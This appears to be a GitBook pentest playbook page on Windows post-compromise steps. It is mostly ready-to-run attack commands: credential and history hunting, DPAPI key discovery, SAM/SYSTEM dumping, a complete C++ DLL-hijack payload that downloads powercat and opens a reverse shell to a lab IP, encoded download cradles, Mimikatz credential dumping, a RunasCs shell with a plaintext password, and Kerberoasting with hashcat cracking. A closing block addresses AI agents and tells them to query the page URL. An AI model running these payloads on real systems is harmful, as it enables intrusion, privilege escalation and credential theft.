# Post Compromise There are several key pieces of information we should always obtain: ``` - Username and hostname - Group memberships of the current user - Existing users and groups - Operating system, version and architecture - Network information - Installed applications - Running processes ``` ### Display network and process info ``` route print netstat -ano powershell -command "Get-Process" tasklist ``` ### Check installed applications ``` # 32 Bits Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname # 64 Bits Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname ``` ### Display Application Details ``` powershell.exe -command "Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*"" ``` ## Searching stuff ```powershell #Search for .kdbx files powershell -command "Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue" #Search for txt , ini files powershell -command "Get-ChildItem -Path C:\ -Include *.txt,*.ini,*.log -File -Recurse -ErrorAction SilentlyContinue" #Search for .txt, .pdf, .xls, .xlsx, .doc, .docx powershell -command 'Get-ChildItem -Path C:\Users\dave\ -Include powershell -command "*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue"' ``` ## Checking History ```powershell Get-History type (Get-PSReadlineOption).HistorySavePath ConsoleHost_history #Find the PATH where is saved type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt cat (Get-PSReadlineOption).HistorySavePath cat (Get-PSReadlineOption).HistorySavePath | sls passw ``` ## Get DPAPI Master Key ```powershell Get-ChildItem C:\Users\dave\AppData\Roaming\Microsoft\Protect\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d---s- 4/1/2024 7:55 AM S-1-5-21-2309961351-4093026482-2223492918-1002 Get-ChildItem -Hidden C:\Users\dave\AppData\Roaming\Microsoft\Protect\S-1-5-21-2309961351-4093026482-2223492918-1002 Mode LastWriteTime Length Name ---- ------------- ------ ---- -a-hs- 11/8/2022 7:36 AM 468 1a65c284-d429-4e6b-b7ab-5fc1a2d95636 -a-hs- 4/1/2024 7:55 AM 468 3ff87438-3511-45ac-91ff-611a4521838f -a-hs- 2/10/2023 5:28 AM 468 7ba528f7-4e73-48a3-8a67-e5680688c9ff -a-hs- 6/15/2022 7:48 PM 468 d713cea3-8216-4125-b4eb-26f1b4b313e7 -a-hs- 4/1/2024 7:55 AM 24 Preferred ``` ## Dumping SYSTEM and LOCAL ``` impacket-secretsdump LOCAL -sam SAM -system SYSTEM ``` ## DLL Injection (if we have System32 folder write access but cannot get shell) ### tzres.dll 1. Generate a custom DLL and locate it at C:\Windows\System32\tzres.dll ```bash # run if cannot compile sudo apt-get install mingw-w64 x86_64-w64-mingw32-gcc rev.cpp --shared -o tzres.dll ``` rev.cpp ```cpp #include #include BOOL APIENTRY DllMain( HANDLE hModule,// Handle to DLL module DWORD ul_reason_for_call,// Reason for calling function LPVOID lpReserved ) // Reserved { switch ( ul_reason_for_call ) { case DLL_PROCESS_ATTACH: // A process is loading the DLL. system ("powershell -w hidden -ep bypass IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.206/powercat.ps1'); powercat -c 192.168.45.206 -p 17788 -e powershell"); break; case DLL_THREAD_ATTACH: // A process is creating a new thread. break; case DLL_THREAD_DETACH: // A thread exits normally. break; case DLL_PROCESS_DETACH: // A process unloads the DLL. break; } return TRUE; } ``` 1.1 Additional (encoding the reverse shell) ```bash echo "IEX (New-Object Net.webclient).downloadString('http://192.168.45.211.ps.ps1')" | iconv -t utf-16le | base64 -w 0; echo powershell -ep bypass -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMQAxADoAOAAwAC8AcABzAC4AcABzADEAJwApAAoA ``` 2. Open listener ``` sudo rlwrap nc -nlvp 17788 ``` 3. Attain a system shell access. ### Printconfig.dll 1. Generate a custom DLL and locate it at C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll. 2. Initiate the PrintNotify object by executing the following PowerShell commands: ``` $type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}") $object = [Activator]::CreateInstance($type) ``` 3. Attain a system shell access. wpcoreutil.dll phoneinfo.dll dxgi.dll wlbsctrl.dll wbecomn.dll ualapi.dll ## Mimikatz ```powershell IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.206/mimikatz.exe'); .\m.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit" > mout.txt ``` ## Fileless Reverse Shell ```powershell powershell -ep bypass IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.206/powercat.ps1'); powercat -c 192.168.45.206 -p 17788 -e powershell ``` ## Double reverse shell (runas also have exe) ```powershell iex(new-object net.webclient).downloadString('http://192.168.45.160/Invoke-RunasCs.ps1'); import-module ./Invoke-RunasCs.ps1;Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "powershell -ep bypass IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.160/powercat.ps1'); powercat -c 192.168.45.160 -p 17676 -e powershell" #Make sure python3 -m http.server 80 192.168.249.187 - - [11/May/2024 15:14:01] "GET /Invoke-RunasCs.ps1 HTTP/1.1" 200 - 192.168.249.187 - - [11/May/2024 15:14:01] "GET /powercat.ps1 HTTP/1.1" 200 - ``` ## Local GetSPN.ps1 ```powershell powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.211/Get-SPN.ps1','C:\Users\Public\Get-SPN.ps1'); ./Get-SPN.ps1 #Request user svc_mssql ticket Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSSQLSvc/DC.access.offsec' wget https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 #Steal the ticket iex(new-object net.webclient).downloadString('http://192.168.49.211:80/Invoke-Kerberoast.ps1'); Invoke-Kerberoast -OutputFormat Hashcat ``` Copy and paste the hash , remember replace **"space"** and all **"\n"** with **"empty"** ```bash hashcat -m 13100 --force -a 0 svc_mssql.kerberoast /usr/share/wordlists/rockyou.txt ``` Cracking the hash with hashcat --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jackmeister.gitbook.io/jackmeister-playbook/network-pentest/window/post-compromise.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.